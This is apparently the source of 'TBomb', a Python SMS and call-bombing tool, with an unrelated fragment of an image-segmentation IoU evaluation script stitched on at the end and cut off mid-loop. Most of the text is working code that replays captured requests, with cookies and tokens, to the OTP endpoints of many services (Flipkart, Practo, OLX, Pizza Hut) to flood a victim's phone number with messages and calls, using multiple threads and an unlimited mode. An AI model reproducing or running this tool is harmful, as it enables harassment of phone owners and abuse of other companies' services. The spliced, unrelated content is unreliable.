'web_app_landing_url': '/personal-loan',
'webapp_landing_referral_url': 'https://www.google.com/',
'ARRAffinity': '747e0c2664f5cb6179583963d834f4899eee9f6c8dcc773fc05ce45fa06b2417',
'_gid': 'GA1.2.969623705.1560660444',
'_gat': '1',
'current_url': 'https://indialends.com/personal-loan',
'cookies_plbt': '0',
}
headers = {
'Host': 'indialends.com',
'Connection': 'keep-alive',
'Content-Length': '75',
'Accept': '*/*',
'Origin': 'https://indialends.com',
'X-Requested-With': 'XMLHttpRequest',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://indialends.com/personal-loan',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {
'aeyder03teaeare': '1',
'ertysvfj74sje': cc,
'jfsdfu14hkgertd': pn,
'lj80gertdfg': '0'
}
response = requests.post('https://indialends.com/internal/a/mobile-verification_v2.ashx', headers=headers, cookies=cookies, data=data)
return True
elif lim == 6:
headers = {
'host': 'www.flipkart.com',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0',
'accept': '*/*',
'accept-language': 'en-US,en;q=0.5',
'accept-encoding': 'gzip, deflate, br',
'referer': 'https://www.flipkart.com/',
'x-user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop',
'origin': 'https://www.flipkart.com',
'connection': 'keep-alive',
'Content-Type': 'application/json; charset=utf-8'}
data = {"loginId":["+"+cc+pn],"supportAllStates":true}
response = requests.post('https://www.flipkart.com/api/6/user/signup/status', headers=headers, json=data)
return True
elif lim == 7:
cookies = {
'Cookie:T': 'BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050',
'SWAB': 'build-44be9e47461a74d737914207bcbafc30',
'lux_uid': '155867904381892986',
'AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg': '1',
'AMCV_17EB401053DAF4840A490D4C%40AdobeOrg': '-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI',
's_cc': 'true',
'SN': '2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078',
'gpv_pn': 'HomePage',
'gpv_pn_t': 'Homepage',
'S': 'd1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==',
's_sq': '%5B%5BB%5D%5D'}
headers = {
'Host': 'www.flipkart.com',
'Connection': 'keep-alive',
'Content-Length': '60',
'X-user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop',
'Origin': 'https://www.flipkart.com',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': '*/*',
'Referer': 'https://www.flipkart.com/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {
'loginId': '+'+cc+pn,
'state': 'VERIFIED',
'churnEmailRequest': 'false'
}
response = requests.post('https://www.flipkart.com/api/5/user/otp/generate', headers=headers, cookies=cookies, data=data)
return True
elif lim == 8:
headers = {
'Host': 'www.ref-r.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': '26',
'DNT': '1',
'Connection': 'keep-alive',
}
data = {
'mobile': pn,
'submit': '1',
'undefined': ''
}
response = requests.post('https://www.ref-r.com/clients/lenskart/smsApi', headers=headers, data=data)
return True
elif lim == 9:
headers = {
'X-DROID-VERSION': '4.12.5',
'API-Version': '2.0',
'user-agent': 'samsung SM-G9350 0 4.4.2',
'client-version': 'Android-4.12.5',
'X-DROID-VERSION-CODE': '158',
'Accept': 'application/json',
'client-name': 'Practo Android App',
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'accounts.practo.com',
'Connection': 'Keep-Alive',
'Content-Length': '96'}
data = {
'client_name': 'Practo Android App',
'mobile': '+'+cc+pn,
'fingerprint': '',
'device_name':'samsung+SM-G9350'}
response = requests.post( "https://accounts.practo.com/send_otp", headers=headers, data=data)
rd=response.text
# rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read()
return rd.find("success") != -1
elif lim == 10:
headers = {
'Host': 'm.pizzahut.co.in',
'content-length': '114',
'origin': 'https://m.pizzahut.co.in',
'authorization': 'Bearer ZXlKaGJHY2lPaUpJVXpJMU5pSXNJblI1Y0NJNklrcFhWQ0o5LmV5SmtZWFJoSWpwN0luUnZhMlZ1SWpvaWIzQXhiR0pyZEcxbGRYSTBNWEJyTlRGNWNqQjBkbUZsSWl3aVlYVjBhQ0k2SW1WNVNqQmxXRUZwVDJsS1MxWXhVV2xNUTBwb1lrZGphVTlwU2tsVmVra3hUbWxLT1M1bGVVcDFXVmN4YkdGWFVXbFBhVWt3VGtSbmFVeERTbmRqYld4MFdWaEtOVm96U25aa1dFSjZZVmRSYVU5cFNUVlBSMUY0VDBkUk5FMXBNV2xaVkZVMVRGUlJOVTVVWTNSUFYwMDFUV2t3ZWxwcVp6Vk5ha0V6V1ZSTk1GcHFXV2xNUTBwd1l6Tk5hVTlwU205a1NGSjNUMms0ZG1RelpETk1iVEZvWTI1U2NWbFhUbkpNYlU1MllsTTVhMXBZV214aVJ6bDNXbGhLYUdOSGEybE1RMHBvWkZkUmFVOXBTbTlrU0ZKM1QyazRkbVF6WkROTWJURm9ZMjVTY1ZsWFRuSk1iVTUyWWxNNWExcFlXbXhpUnpsM1dsaEthR05IYTJsTVEwcHNaVWhCYVU5cVJURk9WR3MxVG5wak1VMUVVWE5KYlRWcFdtbEpOazFVVlRGUFZHc3pUWHByZDA1SU1DNVRaM1p4UmxOZldtTTNaSE5pTVdSNGJWVkdkSEExYW5WMk9FNTVWekIyZDE5TVRuTkJNbWhGVkV0eklpd2lkWEJrWVhSbFpDSTZNVFUxT1RrM016a3dORFUxTnl3aWRYTmxja2xrSWpvaU1EQXdNREF3TURBdE1EQXdNQzB3TURBd0xUQXdNREF0TURBd01EQXdNREF3TURBd0lpd2laMlZ1WlhKaGRHVmtJam94TlRVNU9UY3pPVEEwTlRVM2ZTd2lhV0YwSWpveE5UVTVPVGN6T1RBMExDSmxlSEFpT2pFMU5qQTRNemM1TURSOS5CMGR1NFlEQVptTGNUM0ZHM0RpSnQxN3RzRGlJaVZkUFl4ZHIyVzltenk4',
'x-source-origin': 'PWAFW',
'content-type': 'application/json',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'save-data': 'on',
'languagecode': 'en',
'referer': 'https://m.pizzahut.co.in/login',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
'cookie': 'AKA_A2=A'}
data = {"customer":{"MobileNo":pn,"UserName":pn,"merchantId":"98d18d82-ba59-4957-9c92-3f89207a34f6"}}
response = requests.post('https://m.pizzahut.co.in/api/cart/send-otp?langCode=en', headers=headers, data=data)
return True
elif lim == 11:
headers = {
'host': 'www.goibibo.com',
'user-agent': 'Mozilla/5.0 (Windows NT 8.0; Win32; x32; rv:58.0) Gecko/20100101 Firefox/57.0',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'accept-language': 'en-US,en;q=0.5',
'accept-encoding': 'gzip, deflate, br',
'referer': 'https://www.goibibo.com/mobile/?sms=success',
'content-type': 'application/x-www-form-urlencoded',
'content-length': '14',
'connection': 'keep-alive',
'upgrade-insecure-requests': '1'}
data = {'mbl': pn}
response = requests.post('https://www.goibibo.com/common/downloadsms/', headers=headers, data=data)
return True
elif lim == 12:
headers = {
'Host': 'www.apollopharmacy.in',
'content-length': '17',
'accept': '*/*',
'origin': 'https://www.apollopharmacy.in',
'x-requested-with': 'XMLHttpRequest',
'save-data': 'on',
'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'referer': 'https://www.apollopharmacy.in/sociallogin/mobile/login/',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
'cookie': 'section_data_ids=%7B%22cart%22%3A1560239751%7D'}
data = {'mobile': pn}
response = requests.post('https://www.apollopharmacy.in/sociallogin/mobile/sendotp/', headers=headers, data=data)
rd=response.text
return rd.find("sent") != -1
elif lim == 13:
cookies = {
'Cookie:_ga': 'GA1.2.979928319.1560364071',
'_gid': 'GA1.2.666270216.1560364071',
'V': '201',
'_fbp': 'fb.1.1560364076913.1528349725',
'cto_lwid': 'd91bea3a-7610-45aa-8f78-65a0d740fb46',
'PushSubscriberStatus': 'DENIED',
'peclosed': 'true',
'G_ENABLED_IDPS': 'google',
'TS018cc593': '01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50',
'_gac_UA-68002030-1': '1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB',
'cdigiMrkt': 'utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C',
'ImpressionCookie': '4',
'ip': '10.1.10.1',
'sessionStatus': 'true|undefined',
'FirstPage': 'Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time)',
'_dc_gtm_UA-68002030-1': '1',
'uI': 'johnyaho%40gmail.com',
'TS01fe4249': '01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c'}
headers = {
'Host': 'www.ajio.com',
'Connection': 'keep-alive',
'Content-Length': '144',
'Accept': 'application/json',
'Origin': 'https://www.ajio.com',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36',
'content-type': 'application/json',
'Referer': 'https://www.ajio.com/signup',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6'}
data = {"firstName":"SpeedX","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"0000","requestType":"SENDOTP"}
response = requests.post('https://www.ajio.com/api/auth/signupSendOTP', headers=headers, cookies=cookies, json=data)
rd=response.text
if rd.find("\"statusCode\":\"1\"") != -1:
return True
else:
return False
elif lim == 14:
headers = {
'Host': 'api.cloud.altbalaji.com',
'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*',
'Origin': 'https://lite.altbalaji.com',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36',
'Content-Type': 'application/json;charset=UTF-8',
'Referer': 'https://lite.altbalaji.com/subscribe?progress=input',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {"country_code":cc,"phone_number":pn}
response = requests.post('https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN', headers=headers, json=data)
rd=response.text
return rd == '24f467b24087ff48c96321786d89c69f'
elif lim == 15:
cookies = {
'Cookie:frontend': 'a27mn3h3irt1rlt6i55s93p9r5',
'frontend_cid': '8zqBBzwQTMIt9UKg',
'_BEAMER_USER_ID_gADrycBn12870': 'c9fe4f7d-b421-4bad-9cf2-0a4db716dff4',
'G_ENABLED_IDPS': 'google',
}
headers = {
'Host': 'www.aala.com',
'Connection': 'keep-alive',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Origin': 'https://www.aala.com',
'X-Requested-With': 'XMLHttpRequest',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://www.aala.com/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5',
}
data = {
'email': cc+pn,
'firstname': 'SpeedX',
'lastname': 'SpeedX'
}
response = requests.post('https://www.aala.com/accustomer/ajax/getOTP', headers=headers, cookies=cookies, json=data)
rd=response.text
return rd.find('code:') != -1
elif lim == 16:
data = {
'method': 'SMS',
'countryCode': 'id',
'phoneNumber': cc+pn,
'templateID': 'pax_android_production'
}
response = requests.post('https://api.grab.com/grabid/v1/phone/otp', data=data)
return True
elif lim == 100:
rd = os.popen('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/' +
pn + '?callType=otpOnCall"').read()
return rd.lower().find("new otp has been") != -1
elif lim == 101:
rd = os.popen('curl -s -X POST -d mobile=%2B' + cc + '-' + pn +
' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read()
return rd.lower().find("otp requests exceeded") == -1
elif lim == 102:
rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read()
return rd.lower().find("y") != -1
elif lim == 103:
os.system(
'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')
return True
elif lim == 104:
rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read().decode('utf-8')
return rd.lower().strip().find('callmade') != -1
elif lim == 106:
rd = os.popen(
'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read()
return rd.find("1") != -1
return False
def remsp(num):
num = num.replace(' ', '')
num = num.replace('-', '')
return num
def start(target, counter, delay, ch, cc):
clr()
banner()
failed = 0
requested = 0
success = int(requested) - int(failed)
bombs = int(counter) + 1
while success < (int(bombs)):
os.system('clear')
banner()
try:
api = random.choice(ch)
except Exception:
if cc == "91":
print('Sorry All APIs Have Expired Please Update TBomb')
input('Press Enter To Exit...')
exit()
else:
if success > 0:
print(
'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
print(
'\nWe Are Working Too Hard To Increase The International Limit...')
input(
'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
os.system('rm *.xxx* > /dev/null 2>&1')
print('\n\n')
banner()
exit()
else:
print('\n\n\tSorry Your Country is Not Supported...')
print(
'\t\tPlease Send A Mail To ggspeedx29@gmail.com To Let Us Know...')
input('Press Enter To Exit...')
exit()
print(random.choice(colors))
print("==================================================================")
print(" BOMBING in progress, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +" + str(cc) + " ", target)
print(" Number of Requests Sent : ", requested)
print(" Successful Requests : ", success)
print(" Failed Requests : ", failed)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
try:
result = getapi(target, api, cc)
except Exception:
result = False
requested = requested + 1
if result:
success = success + 1
else:
failed = failed + 1
while ch.count(api) > 0:
ch.remove(api)
time.sleep(float(delay))
if requested % 3 == 0:
checkinternet()
print(W)
print('\n\nBombing Completed..')
os.system('rm *.xxx* > /dev/null 2>&1')
banner()
exit()
def update():
stuff_to_update = ['bomber.py', '.version']
for fl in stuff_to_update:
dat = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/" + fl).read()
file = open(fl, 'wb')
file.write(dat)
file.close()
print('\n\t\tUpdated Successfull !!!!')
print('\tPlease Run The Script Again...')
exit()
clr()
banner()
try:
urllib.request.urlopen('https://www.google.com')
except Exception:
print("You are not connected To Internet!!!")
print("\tPlease Connect To Internet To Continue...\n")
input('Exiting....\n Press Enter To Continue....')
exit()
print('\tChecking For Updates...')
ver = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.version").read().decode('utf-8')
verl = ''
try:
verl = open(".version", 'r').read()
except Exception:
pass
if ver != verl:
print('\n\t\tAn Update is Available....')
print('\tStarting Update...')
update()
print("Your Version is Up-To-Date")
print('\n\n\t\t\tStarting TBomb...\n\n')
try:
noti = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.notify").read().decode('utf-8')
noti = noti.upper().strip()
if len(noti) > 10:
print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception:
pass
while True:
pn = ""
cc = input("\tEnter Your Country Code (Without +) : ")
if '+' in cc:
tc = list(cc)
tc.remove('+')
cc = ''.join(tc)
cc = cc.strip()
pn = input("\tEnter Target Number: +" + cc + " ")
pn = remsp(pn)
if len(cc) >= 4 or len(cc) < 1:
print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
continue
if len(pn) <= 6:
print('\n\nInvalid Phone Number..\n')
continue
for cch in str(cc + pn):
if not cch.isdigit():
print('\n\nPhone Number Must Consist Of Numbers Only\n')
continue
break
type = 0
try:
if sys.argv[1] == "call":
type = 1
except Exception:
type = 0
if type == 1:
nm = int(input("Enter Number of Calls To Send(Maximum 15): "))
if nm > 15:
print("\t\tYou Have Entered " + str(nm) +
".\n\tNormalizing Value To 15")
nm = 15
dl = float(input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
elif type == 0:
if cc == "91":
nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 2 sec ] : "))
else:
nm = int(input("Enter Number of Messages To Send: "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
maxlim = 0
if cc == "91":
maxlim = 500
else:
maxlim = 100
if nm > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
print('Number Of SMS Has been Set To ' + str(maxlim))
nm = maxlim
if not cc.strip() == "91":
if type == 1:
print(
'\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
print()
input('Press Enter To Exit....')
print('\n\n')
banner()
exit()
cnt = 0
if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
ch = [0, 14, 15, 16]
start(pn, nm, dl, ch, str(cc))
exit()
ch = [i for i in range(17)]
cbomb = False
if pn.strip() == '' or dl <= 0 or nm < 0:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
if type == 1:
print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
cbomb = True
if cbomb:
chl = [100, 101, 102, 103, 104, 105, 106]
start(pn, nm, dl, chl, str(cc))
exit()
if nm == 0:
nt = int(input("\tNumber Of Threads(10 to 20) : "))
if nt <= 0 or nt >= 30:
print('\tTBomb Shows Better Result in 10 to 25 Threads\n\t\tStill Continuing....')
print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
t = [None] * nt
print(random.choice(colors))
print("\n\n==================================================================")
print(" Gearing Up Bomber, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +91", pn)
print(" Number of Threads : ", nt)
print(" Delay : ", dl)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
print(W)
input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
os.system('rm *.xxx* > /dev/null 2>&1')
print("\n\nStarting Bomb....")
for i in range(nt):
t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
t[i].daemon = True
t[i].start()
time.sleep(2)
ci = 0
while True:
ci += 1
l = count_inf
print(" Total Number of Requests Sent : ", l)
if int(l) > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
input('Press Enter To Exit...')
os.system('rm *xxx* > /dev/null 2>&1')
banner()
exit()
time.sleep(1)
if ci % 3 == 0:
checkinternet()
else:
start(pn, nm, dl, ch, '91')
exit()
|
evaluation.py
|
import os
import pandas as pd
import numpy as np
from PIL import Image
import multiprocessing
import argparse
categories = ['background','aeroplane','bicycle','bird','boat','bottle','bus','car','cat','chair','cow',
'diningtable','dog','horse','motorbike','person','pottedplant','sheep','sofa','train','tvmonitor']
def do_python_eval(predict_folder, gt_folder, name_list, num_cls=21, input_type='png', threshold=1.0, printlog=False):
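"""Compute per-class IoU and mean IoU over `name_list`.

Predicted masks are read from `predict_folder` and compared against the
ground-truth PNGs in `gt_folder`; ground-truth pixels labelled 255 are ignored.
`input_type` is either 'png' (label maps) or 'npy' (per-class score maps, with
the background channel set to `threshold`).
"""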
TP = []
P = []
T = []
for i in range(num_cls):
TP.append(multiprocessing.Value('i', 0, lock=True))
P.append(multiprocessing.Value('i', 0, lock=True))
T.append(multiprocessing.Value('i', 0, lock=True))
def compare(start,step,TP,P,T,input_type,threshold):
for idx in range(start,len(name_list),step):
name = name_list[idx]
if input_type == 'png':
predict_file = os.path.join(predict_folder,'%s.png'%name)
predict = np.array(Image.open(predict_file)) #cv2.imread(predict_file)
elif input_type == 'npy':
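# The saved dict maps (class index - 1) -> per-pixel score map; channel 0
# (background) is filled with `threshold`, so the argmax below assigns
# background wherever no foreground class scores above the threshold.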
predict_file = os.path.join(predict_folder,'%s.npy'%name)
predict_dict = np.load(predict_file, allow_pickle=True).item()
h, w = list(predict_dict.values())[0].shape
tensor = np.zeros((21,h,w),np.float32)
for key in predict_dict.keys():
tensor[key+1] = predict_dict[key]
tensor[0,:,:] = threshold
predict = np.argmax(tensor, axis=0).astype(np.uint8)
gt_file = os.path.join(gt_folder,'%s.png'%name)
gt = np.array(Image.open(gt_file))
cal = gt<255
mask = (predict==gt) * cal
for i in range(num_cls):
P[i].acquire()
P[i].value += np.sum((predict==i)*cal)
P[i].release()
T[i].acquire()
T[i].value += np.sum((gt==i)*cal)
T[i].release()
TP[i].acquire()
TP[i].value += np.sum((gt==i)*mask)
TP[i].release()
p_list = []
for i in range(8):
p = multiprocessing.Process(target=compare, args=(i,8,TP,P,T,input_type,threshold))
